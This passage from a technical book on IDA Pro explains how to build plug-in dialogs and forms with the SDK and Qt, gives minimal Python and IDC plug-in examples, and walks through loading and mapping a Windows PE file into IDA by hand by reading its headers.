When these functions are used to create nonmodal dialogs, the result is a

new tabbed window displayed alongside the tabs of other IDA display windows,

such as the Imports window. In fact, IDA’s Imports window is implemented

using the choose2 interface. For more information on the capabilities of

choose and choose2, please refer to kernwin.hpp.

Creating Customized Forms with the SDK

For creating more complex user interface elements, the SDK provides the

AskUsingForm_c function. The prototype for this function is shown here:

int AskUsingForm_c(const char *form,...);

2. A modal dialog must be closed before the user is allowed to continue interacting with the

dialog’s parent application. File open and save dialogs are common examples of modal dialogs.

Modal dialogs are typically used when an application requires information from a user before

the application can continue execution. On the other hand, nonmodal or modeless dialogs

allow the user to continue interacting with the parent application while the dialog remains open.

The function seems simple enough, yet it is among the more complex

user interface functions available in the SDK. This complexity is due to the

nature of the form argument, which is used to specify the layout of various

user interface elements within the custom dialog. AskUsingForm_c is similar to

printf in that the form argument is essentially a format string that describes

the layout of various input elements. Where printf format strings utilize out-

put format specifiers that are replaced with formatted data, AskUsingForm_c

format strings are composed of both output specifiers and form field specifi-

ers that are replaced with instances of input elements when the form is dis-

played. AskUsingForm_c recognizes a completely different set of output field

specifiers than printf. These specifiers are detailed in kernwin.hpp along with

complete documentation on the use of AskUsingForm_c. The basic format of a

form field specifier is shown here:

<#hint text#label:type:width:swidth:@hlp[]>

The individual components of a form field specifier are described in the

following list:

#hint text# This element is optional. If present, the hint text, excluding

the # characters, is displayed as a tool tip when the mouse hovers over the

associated input field.

label Static text displayed as a label to the left of the associated input

field. In the case of button fields, this is the button text.

type A single character indicates the type of form field being specified.

Form field types are described following this list.

width The maximum number of input characters accepted by the

associated input field. In the case of button fields, this field specifies

an integer button identification code used to distinguish one button

from another.

swidth The display width of the input field.

@hlp[] This field is described in kernwin.hpp as “the number of help

screen from the IDA.HLP file.” Since the content of this file is dictated

by Hex-Rays, it seems unlikely that this field will be of use in the majority

of cases. Substitute a colon for this field in order to ignore it.
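As a quick check on the layout of a field specifier, the following sketch assembles one from its components. The helper make_field is hypothetical and is not part of the SDK; it always skips the help-screen field by writing a colon in its place, as suggested above.

```cpp
#include <string>

// Hypothetical helper that assembles one form field specifier from its
// parts. The help-screen field is replaced with a colon.
std::string make_field(const std::string &hint, const std::string &label,
                       char type, int width, int swidth) {
    std::string s = "<";
    if (!hint.empty()) {
        s += "#" + hint + "#";        // optional tool tip
    }
    s += label + ":" + std::string(1, type) + ":" +
         std::to_string(width) + ":" + std::to_string(swidth) + "::>";
    return s;
}
```

For example, a hinted string field with a width and display width of 32 comes out as <#Enter a name#Name:A:32:32::>, while a field with no hint simply begins with its label.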

The characters used for the type field specify what type of input field will

be generated when the dialog is realized at runtime. Each type of form field

requires an associated parameter in the variable arguments portion of the

AskUsingForm_c parameter list. Form field type specifiers and their associated
parameter types are shown here (as taken from kernwin.hpp):

Input field types                              va_list parameter
-----------------                              -----------------
A - ascii string                               char* at least MAXSTR size
S - segment                                    sel_t*
N - hex number, C notation                     uval_t*
n - signed hex number, C notation              sval_t*
L - default base (usually hex) number,         ulonglong*
    C notation
l - default base (usually hex) number,         longlong*
    signed C notation
M - hex number, no "0x" prefix                 uval_t*
D - decimal number                             sval_t*
O - octal number, C notation                   sval_t*
Y - binary number, "0b" prefix                 sval_t*
H - char value, C notation                     sval_t*
$ - address                                    ea_t*
I - ident                                      char* at least MAXNAMELEN size
B - button                                     formcb_t button callback function
K - color button                               bgcolor_t*
C - checkbox                                   ushort* bit mask of checked boxes
R - radiobutton                                ushort* number of selected radiobutton

All numeric fields interpret the user-supplied input as an IDC expression

that is parsed and evaluated when the user clicks the dialog’s OK button. All

fields require a pointer argument that is used for both input and output.

When the form is first generated, initial values for all form fields are taken by

dereferencing the associated pointers. Upon return, the user-supplied form

field values are written into the associated memory locations. The pointer

argument associated with a button (B) field is the address of a function that

will be called if the associated button is pressed. The formcb_t function is

defined as follows.

// callback for buttons

typedef void (idaapi *formcb_t)(TView *fields[],int code);

The code argument to the button callback represents the code (width)

value associated with the button that was clicked. By using a switch statement to

test this code, you can use a single function to process many different buttons.

The syntax for specifying radio button and checkbox controls differs

slightly from the format of other types of form fields. These fields utilize the

following format:

<#item hint#label:type>

Radio buttons and checkboxes may be grouped by listing their specifiers

in order and denoting the end of the list using the following special format

(note the extra > at the end).

<#item hint#label:type>>


A radio button (or checkbox) group will be boxed to highlight the group.

You can give the box a title by utilizing a special format when specifying the

first element in the group, as shown here:

<#item hint#title#box hint#label:type>

If you want to have a box title but do not want to use any hints, the hints

may be omitted, leaving the following format specifier:

<##title##label:type>
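The grouping rules above can be sketched in a few lines of Python. The make_group helper is hypothetical (it is not an SDK function) and assumes that no hints are wanted: it places the optional box title on the first item and closes the last item with the extra > character.

```python
def make_group(ftype, labels, title=None):
    """Build the specifier lines for a radio button ("R") or checkbox ("C") group.

    Hypothetical helper for illustration only. The first item optionally
    carries the box title (with empty hints), and the final item ends
    with an extra '>' to mark the end of the group.
    """
    lines = []
    for i, label in enumerate(labels):
        prefix = "##%s##" % title if (title and i == 0) else ""
        closer = ">>" if i == len(labels) - 1 else ">"
        lines.append("<%s%s:%s%s" % (prefix, label, ftype, closer))
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(make_group("R", ["Radio 1", "Radio 2"], title="Radio Buttons"), end="")
```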

At this point let’s look at an example of a dialog constructed using

AskUsingForm_c. Figure 17-6 shows a dialog that we will refer to throughout

this discussion.

Figure 17-6: Sample AskUsingForm_c dialog

Format strings used to create AskUsingForm_c dialogs are made up of individual
lines that specify each aspect of the desired dialog. In addition to form
field specifiers, the format string may contain static text that is displayed,
verbatim, in the resulting dialog. Finally, the format string may contain a
dialog title (which must be followed by two newline characters) and one or more
behavior directives (such as STARTITEM, which specifies the index of the form
field that is initially active when the dialog is first displayed). The format
string used to create the dialog in Figure 17-6 is shown here:

const char *dialog =
   "STARTITEM 0\n"                      //The first item gets the input focus
   "This is the title\n\n"              //followed by 2 new lines
   "This is static text\n"
   "<String:A:32:32::>\n"               //An ASCII input field, need char[MAXSTR]
   "<Decimal:D:10:10::>\n"              //A decimal input field, sval_t*
   "<#No leading 0x#Hex:M:8:10::>\n"    //A Hex input field with hint, uval_t*
   "<Button:B::::>\n"                   //A button field with no code, formcb_t
   "<##Radio Buttons##Radio 1:R>\n"     //A radio button with box title
   "<Radio 2:R>>\n"                     //Last radio button in group
                                        //ushort* number of selected radio
   "<##Check Boxes##Check 1:C>\n"       //A checkbox field with a box title
   "<Check 2:C>>\n";                    //Last checkbox in group
                                        //ushort* bitmask of checks

By formatting the dialog specification one element per line, we make it easier
to map each field specifier to its corresponding field in Figure 17-6. You may
notice that in Figure 17-6, all of the text and numeric input fields appear as
drop-down list controls. In an effort to save you time, IDA populates each list
with recently entered values whose type matches the type of the associated
input field. The following plug-in code may be used to display the example
dialog and process any results:

void idaapi button_func(TView *fields[], int code) {
   msg("The button was pressed!\n");
}

void idaapi run(int arg) {
   char input[MAXSTR];
   sval_t dec = 0;
   uval_t hex = 0xdeadbeef;
   ushort radio = 1;       //select button 1 initially
   ushort checkmask = 3;   //select both checkboxes initially
   qstrncpy(input, "initial value", sizeof(input));
   if (AskUsingForm_c(dialog, input, &dec, &hex,
                      button_func, &radio, &checkmask) == 1) {
      msg("The input string was: %s\n", input);
      //%d and %x assume 32-bit sval_t and uval_t (a non-EA64 build)
      msg("Decimal: %d, Hex %x\n", dec, hex);
      msg("Radio button %d is selected\n", radio);
      //walk the bit mask; bit n set means checkbox n is checked
      for (int n = 0; checkmask; n++) {
         if (checkmask & 1) {
            msg("Checkbox %d is checked\n", n);
         }
         checkmask >>= 1;
      }
   }
}

Note that when processing radio button and checkbox results, the first

button in each group is considered button zero.
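The zero-based numbering is perhaps easiest to see by decoding a checkbox bit mask outside of IDA. The following Python sketch mirrors the loop used in the plug-in code; the function name checked_boxes is our own and is used for illustration only.

```python
def checked_boxes(checkmask):
    """Return the zero-based indexes of the checkboxes set in a bit mask.

    Bit 0 corresponds to the first checkbox in the group, bit 1 to the
    second, and so on.
    """
    indexes = []
    n = 0
    while checkmask:
        if checkmask & 1:
            indexes.append(n)
        checkmask >>= 1
        n += 1
    return indexes


if __name__ == "__main__":
    # A mask of 3 (binary 11) means the first two checkboxes are checked
    print(checked_boxes(3))
```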

The AskUsingForm_c function provides a considerable amount of power

for designing user interface elements for your plug-ins. The example here

touches on many of the capabilities of this function, but many more are

detailed in kernwin.hpp. Please refer to this file for more information on the

AskUsingForm_c function and its capabilities.

Windows-Only User Interface–Generation Techniques

Many developers have wrestled with the problem of creating user interfaces
for their plug-ins. Plug-ins targeting the Windows-only GUI version of IDA
(idag.exe) have the entire Windows graphical API at their disposal. The
author of the mIDA3 plug-in from Tenable Security developed an alternate
approach for creating the MDI4 client windows used in the mIDA plug-in.
A lengthy thread5 on the challenges faced by the mIDA developers can be
found in the IDA support forums. The thread also contains example code
that demonstrates their solution to the problem.

The ida-x86emu6 plug-in takes a slightly different approach in its user

interface. This plug-in relies on the fact that a handle to IDA’s main window

can be obtained using the following SDK code:

HWND mainWindow = (HWND)callui(ui_get_hwnd).vptr;

Using the main IDA window as a parent, ida-x86emu currently makes no
attempt to integrate into the IDA workspace. All of the plug-in’s dialog
interfaces are generated using a Windows resource editor, and all user
interactions are handled using direct calls to Windows API functions. The use
of a graphical dialog editor in conjunction with direct calls to native Windows
API functions provides the most powerful user interface–generation capability
at the expense of added complexity and the additional knowledge required to
process Windows messages and work with lower-level interface functions.

User Interface Generation with Qt

The Qt user interface introduced in IDA 6.0 offers plug-in developers

the chance to create plug-ins with complex user interfaces capable of being

used on all IDA platforms. Hex-Rays’ Daniel Pistelli7 discusses some of the

requirements for using Qt in your plug-ins in a blog post on the Hex-Rays

blog.8 In this section we will reiterate some of the important points that Daniel

makes as well as point out some additional useful information.

If you wish to make use of any Qt functionality in your plug-ins, you must

begin by properly configuring a Qt development environment. IDA 6.1 ships

with its own versions of the Qt 4.7.2 libraries.9 When Hex-Rays builds its Qt

libraries, it wraps the libraries in a C++ namespace named QT. To configure

your development environment, obtain the appropriate Qt sources from

Nokia. The Windows version of idaq is built with Visual Studio 2008,10 and

the Linux and OS X versions use g++. The appropriate sources for Windows

may be found here:

ftp://ftp.qt.nokia.com/qt/source/qt-win-opensource-4.7.2-vs2008.exe

3. See http://cgi.tenablesecurity.com/tenable/mida.php.

4. The Windows Multiple Document Interface (MDI) allows multiple child (client) windows to be

contained within a single container window.

5. See http://www.hex-rays.com/forum/viewtopic.php?f=8&t=1660&p=6752.

6. See http://www.idabook.com/ida-x86emu.

7. Daniel led the Hex-Rays effort to migrate IDA’s GUI to Qt.

8. See http://www.hexblog.com/?p=250.

9. IDA 6.0 utilized Qt 4.6.3.

10. As a consequence, if you are building a Qt-related plug-in on Windows, you must use Visual

Studio to build your plug-in.


Sources for Linux and OS X can be found here:

ftp://ftp.qt.nokia.com/qt/source/qt-everywhere-opensource-src-4.7.2.tar.gz

See Daniel’s blog post for specific commands to configure your sources.

The key to proper configuration is the following command-line parameter:

-qtnamespace QT

This parameter causes the Qt sources to be wrapped in the QT namespace.
In order to build any Qt-related plug-ins on Windows, you will need

link libraries (.lib files) for each Qt library that you utilize in your plug-in.

While IDA ships with a number of dynamic link libraries for Qt (see <IDADIR>

for a complete list), the SDK ships with a very limited number of Qt link

libraries for Windows (notably QtCore4 and QtGui), which may be found

in <SDKDIR>/lib/x86_win_qt. If you need additional link libraries, you will

need to link against the libraries that you build yourself from the Qt sources.

On Linux and OS X, you can link directly with the Qt libraries that ship with

IDA. On Linux, these can be found in <IDADIR>; on OS X these can be

found in <IDADIR>/idaq.app/Contents/Frameworks. Note that linking against

Qt libraries that don’t ship with IDA will make your plug-in somewhat less

portable, unless you also distribute those libraries along with your plug-in.

When configuring your Qt plug-in projects, make sure that your qmake

project file contains the following configuration directive:

QT_NAMESPACE = QT

IDA defines a number of functions for safer string handling within the
SDK. These include functions such as qstrlen and qsnprintf, which have long
been part of the SDK. With the move to a Qt-based GUI, this leads to problems
because Qt also defines several functions named the same as those provided by
IDA. The IDA functions reside in the global namespace, while the Qt functions
reside in the QT namespace. The IDA versions of such functions can be called by
explicitly referencing the global namespace as shown here:

unsigned int len = ::qstrlen(myString);

Should you need a parent widget for any widgets that you are creating in

your plug-in, the following statement will obtain a pointer to idaq’s top-level

application window:

QWidget *mainWindow = QApplication::activeWindow();

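This invokes a static method within Qt’s QApplication class that returns
a pointer to the application’s currently active top-level window. Note that
activeWindow returns NULL when none of the application’s windows has the
input focus, so check the result before using it as a parent.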

For more information on configuring your plug-ins to use Qt, refer to

Daniel’s blog post. Additionally, the qwindow plug-in sample that ships with

IDA’s SDK provides an example of a plug-in that makes use of Qt. Specifically,
it contains example code that creates an empty widget (using create_tform),
uses callbacks to receive notification that the form is being made visible,
obtains a QWidget pointer to the newly created form, and finally populates
the form with a Qt button object. The collabREate and ida-x86emu plug-ins
to be discussed in Chapter 23 also make use of Qt GUI elements to allow
these plug-ins to be used on all IDA-capable platforms.

Scripted Plug-ins

IDA 5.6 introduced support for scripted loader modules. In IDA 5.7, support

was added for scripted plug-ins11 and processor modules. While this does

not necessarily allow for the development of more powerful plug-ins, it does

somewhat lower the barrier to entry for potential plug-in developers and

allows for a somewhat faster development cycle because the complex build

process is eliminated.

Although scripted plug-ins can be created using either IDC or Python,

Python is probably the most appropriate choice given that it exposes so

much of IDA’s SDK. Given this fact, there is no reason why Python plug-ins

can’t be just as powerful as compiled C++ plug-ins.

Creating a Python plug-in is a straightforward process. The primary

requirement is to define a function named PLUGIN_ENTRY that returns an

instance of plugin_t (defined in module idaapi). The plugin_t class contains

members that mirror the members of the SDK’s C++ plugin_t class. Listing 17-4

shows a simple Python plug-in that defines a class named idabook_plugin_t,

which inherits from plugin_t; initializes all required members; and defines

init, term, and run functions that implement the plug-in behavior.

from idaapi import *

class idabook_plugin_t(plugin_t):
    flags = 0
    wanted_name = "IdaBook Python Plugin"
    wanted_hotkey = "Alt-8"
    comment = "IdaBook Python Plugin"
    help = "Something helpful"

    def init(self):
        msg("IdaBook plugin init called.\n")
        return PLUGIN_OK

    def term(self):
        msg("IdaBook plugin term called.\n")

    def run(self, arg):
        warning("IdaBook plugin run(%d) called.\n" % arg)

def PLUGIN_ENTRY():
    return idabook_plugin_t()

Listing 17-4: A minimal Python plug-in

11. See http://www.hexblog.com/?p=120.

Installation of the plug-in script is accomplished by copying the script to

<IDADIR>/plugins.

The same plug-in written in IDC appears in Listing 17-5. Since IDC does

not define a plug-in–related base class, our obligation is to create a class that

defines all the elements expected of a plug-in, ensuring that we name each

element properly.

#include <idc.idc>

class idabook_plugin_t {
   idabook_plugin_t() {
      this.flags = 0;
      this.wanted_name = "IdaBook IDC Plugin";
      this.wanted_hotkey = "Alt-9";
      this.comment = "IdaBook IDC Plugin";
      this.help = "Something helpful";
   }
   init() {
      Message("IdaBook plugin init called.\n");
      return PLUGIN_OK;
   }
   term() {
      Message("IdaBook plugin term called.\n");
   }
   run(arg) {
      Warning("IdaBook plugin run(%d) called.\n", arg);
   }
}

static PLUGIN_ENTRY() {
   return idabook_plugin_t();
}

Listing 17-5: A minimal IDC plug-in

As with the Python example, the PLUGIN_ENTRY function serves to create

and return an instance of our plug-in class. Installation, once again, involves

copying the .idc file to <IDADIR>/plugins.


Summary

IDA plug-ins are the logical next step when scripting fails to meet your needs

for extending IDA’s capabilities, though with the advent of scripted plug-ins,

you may find yourself resisting the urge to dive into the SDK. Additionally,

unless you are faced with the challenge of reverse engineering a file format

that is unknown to IDA or a machine language for which IDA has no processor
module, plug-ins may be the only type of IDA extension that you ever feel

the need to explore. Nonetheless, in the next two chapters, we continue to

explore the capabilities offered by IDA’s SDK by looking at the other types of

modules that can be constructed for use with IDA: loaders and processor

modules.


BINARY FILES AND IDA LOADER MODULES

One day word will get out that you have become the resident IDA geek. You may
relish the fact that you have hit the big time, or you may bemoan the fact that
from that day forward, people will be interrupting you with questions about
what some file does. Eventually, either as a result of one such question or
simply because you enjoy using IDA to open virtually every file you can find,
you may be confronted with the dialog shown in Figure 18-1.

This is IDA’s standard file-loading dialog with a minor problem (from

the user’s perspective). The short list of recognized file types contains only

one entry, Binary file, indicating that none of IDA’s installed loader modules

recognize the format of the file you want to load. Hopefully you will at least

know what machine language you are dealing with (you do at least know

where the file came from, right?) and can make an intelligent choice for

the processor type, because that is about all you can do in such cases.


Figure 18-1: Loading a binary file

In this chapter we will discuss IDA’s capabilities for helping you make

sense of unrecognized file types, beginning with manual analysis of binary

file formats and then using that as motivation for the development of your

own IDA loader modules.

Unknown File Analysis

A seemingly endless variety of file formats exists for storing executable
code. IDA ships with loader modules to recognize many of the more common file
formats, but there is no way that IDA can accommodate the ever-increasing
number of formats in existence. Binary images may contain executable files
formatted for use with specific operating systems, ROM images extracted
from embedded systems, firmware images extracted from flash updates, or
simply raw blocks of machine language, perhaps extracted from network
packet captures. The format of these images may be dictated by the operating
system (executable files), the target processor and system architecture
(ROM images), or nothing at all (exploit shellcode embedded in application
layer data).

Assuming that a processor module is available to disassemble the code
contained in the unknown binary, it will be your job to properly arrange the
file image within an IDA database before informing IDA which portions of
the binary represent code and which portions of the binary represent data.
For most processor types, the result of loading a file using the binary format
is simply a list of the contents of the file piled into a single segment
beginning at address zero, as shown in Listing 18-1.

seg000:00000000 db 4Dh ; M

seg000:00000001 db 5Ah ; Z

seg000:00000002 db 90h ; É

seg000:00000003 db 0

seg000:00000004 db 3

seg000:00000005 db 0

seg000:00000006 db 0

seg000:00000007 db 0

Listing 18-1: Initial lines of a PE file loaded in binary mode

In some cases, depending on the sophistication of the selected processor

module, some disassembly may take place. This may be the case when a

selected processor is an embedded microcontroller that can make specific

assumptions about the memory layout of ROM images. For those interested

in such applications, Andy Whittaker has created an excellent walk-through1

of reverse engineering a binary image for a Siemens C166 microcontroller

application.

When faced with binary files, you will almost certainly need to arm yourself
with as many resources related to the file as you can get your hands on.
Such resources might include CPU references, operating system references,
system design documentation, and any memory layout information obtained
through debugging or through hardware-assisted analysis (using logic
analyzers, for example).

In the following section, for the sake of example we assume that IDA
does not recognize the Windows PE file format. PE is a well-known file format
that many readers may be familiar with. More important, documents detailing
the structure of PE files are widely available, which makes dissecting an
arbitrary PE file a relatively simple task.

Manually Loading a Windows PE File

When you can find documentation on the format utilized by a particular file,

your life will be significantly easier as you attempt to map the file into an IDA

database. Listing 18-1 shows the first few lines of a PE file loaded into IDA as

a binary file. With no help from IDA, we turn to the PE specification,2 which

states that a valid PE file will begin with a valid MS-DOS header structure. A

valid MS-DOS header structure in turn begins with the 2-byte signature 4Dh

5Ah (MZ), which we see in the first two lines of Listing 18-1.

1. See http://www.andywhittaker.com/ECU/DisassemblingaBoschME755/tabid/96/Default.aspx.

2. See http://www.microsoft.com/whdc/system/platform/firmware/PECOFF.mspx (EULA acceptance required).

At this point an understanding of the layout of an MS-DOS header is
required. The PE specification tells us that the 4-byte value located at
offset 0x3C in the file indicates the offset to the next header we need to
find: the PE header. Two strategies for breaking down the fields of the MS-DOS
header are (1) to define appropriately sized data values for each field in the
MS-DOS header or (2) to use IDA’s structure-creation facilities to define and
apply an IMAGE_DOS_HEADER structure in accordance with the PE file
specification.3 Using the latter approach would yield the following modified
display:

seg000:00000000 dw 5A4Dh ; e_magic

seg000:00000000 dw 90h ; e_cblp

seg000:00000000 dw 3 ; e_cp

seg000:00000000 dw 0 ; e_crlc

seg000:00000000 dw 4 ; e_cparhdr

seg000:00000000 dw 0 ; e_minalloc

seg000:00000000 dw 0FFFFh ; e_maxalloc

seg000:00000000 dw 0 ; e_ss

seg000:00000000 dw 0B8h ; e_sp

seg000:00000000 dw 0 ; e_csum

seg000:00000000 dw 0 ; e_ip

seg000:00000000 dw 0 ; e_cs

seg000:00000000 dw 40h ; e_lfarlc

seg000:00000000 dw 0 ; e_ovno

seg000:00000000 dw 4 dup(0) ; e_res

seg000:00000000 dw 0 ; e_oemid

seg000:00000000 dw 0 ; e_oeminfo

seg000:00000000 dw 0Ah dup(0) ; e_res2

seg000:00000000 dd 80h ➊; e_lfanew

The e_lfanew field ➊ has a value of 80h, indicating that a PE header
should be found at offset 80h (128 bytes) into the database. Examining the
bytes at offset 80h should reveal the magic number for a PE header, 50h 45h
(PE) followed by two zero bytes, and allow us to build (based on our reading
of the PE specification) and apply an IMAGE_NT_HEADERS structure at offset 80h
into the database. A portion of the resulting IDA listing might look like the
following:

seg000:00000080 dd 4550h      ; Signature
seg000:00000080 dw 14Ch      ➋; FileHeader.Machine
seg000:00000080 dw 4         ➎; FileHeader.NumberOfSections
seg000:00000080 dd 47826AB4h  ; FileHeader.TimeDateStamp
seg000:00000080 dd 0E00h      ; FileHeader.PointerToSymbolTable
seg000:00000080 dd 0FBh       ; FileHeader.NumberOfSymbols
seg000:00000080 dw 0E0h       ; FileHeader.SizeOfOptionalHeader
seg000:00000080 dw 307h       ; FileHeader.Characteristics
seg000:00000080 dw 10Bh       ; OptionalHeader.Magic
seg000:00000080 db 2          ; OptionalHeader.MajorLinkerVersion
seg000:00000080 db 38h        ; OptionalHeader.MinorLinkerVersion
seg000:00000080 dd 600h       ; OptionalHeader.SizeOfCode
seg000:00000080 dd 400h       ; OptionalHeader.SizeOfInitializedData
seg000:00000080 dd 200h       ; OptionalHeader.SizeOfUninitializedData
seg000:00000080 dd 1000h     ➍; OptionalHeader.AddressOfEntryPoint
seg000:00000080 dd 1000h      ; OptionalHeader.BaseOfCode
seg000:00000080 dd 0          ; OptionalHeader.BaseOfData
seg000:00000080 dd 400000h   ➌; OptionalHeader.ImageBase
seg000:00000080 dd 1000h     ➐; OptionalHeader.SectionAlignment
seg000:00000080 dd 200h      ➏; OptionalHeader.FileAlignment

3. Refer to “Using Standard Structures” on page 151 for a discussion on adding these structure types in IDA.

The preceding listings and discussion bear many similarities to the
exploration of MS-DOS and PE header structures conducted in Chapter 8.
In this case, however, the file has been loaded into IDA without the benefit
of the PE loader, and rather than being a curiosity as they were in Chapter 8,
the header structures are essential to a successful understanding of the
remainder of the database.
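The header walk described so far can also be sketched outside of IDA. The following Python example is a minimal sketch, not a full PE parser: it assumes a 32-bit (PE32) image, takes its field offsets from our reading of the PE specification, and uses a function name, parse_pe_headers, that is our own invention.

```python
import struct


def parse_pe_headers(data):
    """Extract a few header fields from the raw bytes of a PE32 file.

    Sketch only: assumes a 32-bit (PE32) optional header and performs
    minimal validation.
    """
    if data[:2] != b"MZ":
        raise ValueError("missing MS-DOS signature")
    # e_lfanew is the 4-byte little-endian value at file offset 0x3C
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # The 20-byte IMAGE_FILE_HEADER follows the 4-byte signature
    (machine, nsections, _timestamp, _symtab, _nsyms,
     opt_size, _characteristics) = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24  # start of the optional header
    # PE32 layout: AddressOfEntryPoint at +16, ImageBase at +28
    (entry_rva,) = struct.unpack_from("<I", data, opt + 16)
    (image_base,) = struct.unpack_from("<I", data, opt + 28)
    return {
        "e_lfanew": e_lfanew,
        "Machine": machine,
        "NumberOfSections": nsections,
        "AddressOfEntryPoint": entry_rva,
        "ImageBase": image_base,
        # The section headers begin right after the optional header
        "section_table": opt + opt_size,
    }
```

Applied to a file with the header values shown in the listings above, the computed section_table offset would be 80h + 18h + 0E0h = 178h.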

At this point, we have revealed a number of interesting pieces of information
that will help us to further refine our database layout. First, the Machine ➋
field in a PE header indicates the target CPU type for which the file was
built. In this example the value 14Ch indicates that the file is for use with
x86 processor types. Had the machine type been something else, such as 1C0h
(ARM), we would actually need to close the database and restart our analysis,
making certain that we select the correct processor type in the initial loading
dialog. Once a database has been loaded, it is not possible to change the
processor type in use with that database.
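A small lookup table is one way to make this check explicit before committing to a processor type. The sketch below contains only the two machine values mentioned above; the table and function names are hypothetical, and a real tool would need the complete list from the PE specification.

```python
# Machine values taken from the discussion above; this table is
# deliberately incomplete and is for illustration only.
MACHINE_TYPES = {
    0x14C: "x86",
    0x1C0: "ARM",
}


def describe_machine(machine):
    """Return a readable name for a PE Machine value, if we know it."""
    return MACHINE_TYPES.get(machine, "unknown (0x%X)" % machine)


if __name__ == "__main__":
    print(describe_machine(0x14C))
```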

The ImageBase ➌ field indicates the base virtual address for the loaded file
image. Using this information, we can finally begin to incorporate some virtual
address information into the database. Using the Edit ▸ Segments ▸ Rebase
Program menu option, we can specify a new base address for the first segment
of the program, as shown in Figure 18-2.

Figure 18-2: Specifying a new base address for a program

In the current example, only one segment exists, because IDA creates

only one segment to hold the entire file when a file is loaded in binary mode.

The two checkbox options shown in the dialog determine how IDA handles

relocation entries when segments are moved and whether IDA should move

every segment present in the database, respectively. For a file loaded in binary

mode, IDA will not be aware of any relocation information. Similarly, with

only one segment present in the program, the entire image will be rebased

by default.

The AddressOfEntryPoint ➍ field specifies the relative virtual address
(RVA) of the program entry point. An RVA is a relative offset from the
program’s base virtual address, while the program entry point represents the
address of the first instruction within the program that will be executed. In
this case an entry point RVA of 1000h indicates that the program will begin
execution at virtual address 401000h (400000h + 1000h). This is an important
piece of information, because it is our first indication of where we should
begin looking for code within the database. Before we can do that, however,
we need to properly map the remainder of the database to appropriate virtual
addresses.
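The RVA arithmetic is simple enough to capture in a pair of helper functions. These Python helpers are our own and are shown only to make the conversion explicit.

```python
def rva_to_va(image_base, rva):
    """Convert a relative virtual address to a virtual address."""
    return image_base + rva


def va_to_rva(image_base, va):
    """Convert a virtual address back to a relative virtual address."""
    return va - image_base


if __name__ == "__main__":
    # ImageBase 400000h plus an entry point RVA of 1000h
    print("%Xh" % rva_to_va(0x400000, 0x1000))
```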

The PE format makes use of sections to describe the mapping of file
content to memory ranges. By parsing the section headers for each section
in the file, we can complete the basic virtual memory layout of the database.
The NumberOfSections ➎ field indicates the number of sections contained in
a PE file; in this case there are four. Referring once again to the PE
specification, we would learn that an array of section header structures
immediately follows the IMAGE_NT_HEADERS structure. Individual elements in the
array are IMAGE_SECTION_HEADER structures, which we could define in IDA’s
Structures window and apply (four times in this case) to the bytes following
the IMAGE_NT_HEADERS structure.
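To show what walking the section header array involves, here is a short Python sketch that unpacks consecutive IMAGE_SECTION_HEADER records. The 40-byte layout is taken from our reading of the PE specification, and the function name parse_section_headers, along with the choice of which fields to keep, is ours.

```python
import struct

# Name[8], VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
# PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
# NumberOfLinenumbers, Characteristics (40 bytes in total)
SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")


def parse_section_headers(data, table_offset, count):
    """Unpack count section headers starting at table_offset."""
    sections = []
    for i in range(count):
        fields = SECTION_HEADER.unpack_from(
            data, table_offset + i * SECTION_HEADER.size)
        sections.append({
            "Name": fields[0].rstrip(b"\0").decode("ascii", "replace"),
            "VirtualSize": fields[1],
            "VirtualAddress": fields[2],
            "SizeOfRawData": fields[3],
            "PointerToRawData": fields[4],
            "Characteristics": fields[9],
        })
    return sections
```

The table_offset argument is the file offset of the first section header, which is the offset of the first byte following the IMAGE_NT_HEADERS structure.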

Before we discuss segment creation, two additional fields worth pointing
out are FileAlignment ➏ and SectionAlignment ➐. These fields indicate how the
data for each section is aligned4 within the file and how that same data will
be aligned when mapped into memory, respectively. In our example, each
section is aligned to a 200h byte offset within the file; however, when loaded
into memory, those same sections will be aligned on addresses that are
multiples of 1000h. The smaller FileAlignment value offers a means of saving
space when an executable image is stored in a file, while the larger
SectionAlignment value typically corresponds to the operating system’s virtual
memory page size. Understanding how sections are aligned can help us avoid
errors when we manually create sections within our database.
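Rounding a size or address up to an alignment boundary is a calculation that comes up repeatedly when laying out sections by hand. The following Python helper is a minimal sketch of that calculation; the name align_up is ours, and the 440h input used below is just an arbitrary illustrative size.

```python
def align_up(value, alignment):
    """Round value up to the next multiple of alignment."""
    return (value + alignment - 1) // alignment * alignment


if __name__ == "__main__":
    # The same 440h bytes occupy different amounts of space in the file
    # (FileAlignment 200h) and in memory (SectionAlignment 1000h)
    print("%Xh" % align_up(0x440, 0x200))
    print("%Xh" % align_up(0x440, 0x1000))
```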

After structuring each of the section headers, we finally have enough
information to begin creating additional segments within the database.
Applying an IMAGE_SECTION_HEADER template to the bytes immediately following
the IMAGE_NT_HEADERS structure yields the first section header and results in
the following data displayed in our example database:

seg000:00400178 db '.text',0,0,0 ➊; Name
seg000:00400178 dd 440h           ; VirtualSize
seg000:00400178 dd 1000h         ➌; VirtualAddress
seg000:00400178 dd 600h          ➍; SizeOfRawData
seg000:00400178 dd 400h          ➋; PointerToRawData
seg000:00400178 dd 0              ; PointerToRelocations
seg000:00400178 dd 0              ; PointerToLinenumbers
seg000:00400178 dw 0              ; NumberOfRelocations
seg000:00400178 dw 0              ; NumberOfLinenumbers
seg000:00400178 dd 60000020h      ; Characteristics

4. Alignment describes the starting address or offset of a block of data. The address or offset must be an exact multiple of the alignment value. For example, when data is aligned to a 200h-byte (512-byte) boundary, it must begin at an address (or offset) that is evenly divisible by 200h.

The Name ➊ field informs us that this header describes the .text section.
All of the remaining fields are potentially useful in formatting the database,
but we will focus on the three that describe the layout of the section. The
PointerToRawData ➋ field (400h) indicates the file offset at which the content
of the section can be found. Note that this value is a multiple of the file
alignment value, 200h. Sections within a PE file are arranged in increasing
file offset (and virtual address) order. Since this section begins at file
offset 400h, we can conclude that the first 400h bytes of the file contain file
header data. Therefore, even though they do not, strictly speaking, constitute
a section, we can highlight the fact that they are logically related by
grouping them into a section in the database.

The EditSegmentsCreate Segment command is used to manually

create segments in a database. Figure 18-3 shows the segment-creation dialog.

Figure 18-3: The segment-creation dialog

When creating a segment, you may specify any name you wish. Here we
choose .headers, because it is unlikely to be used as an actual section name in
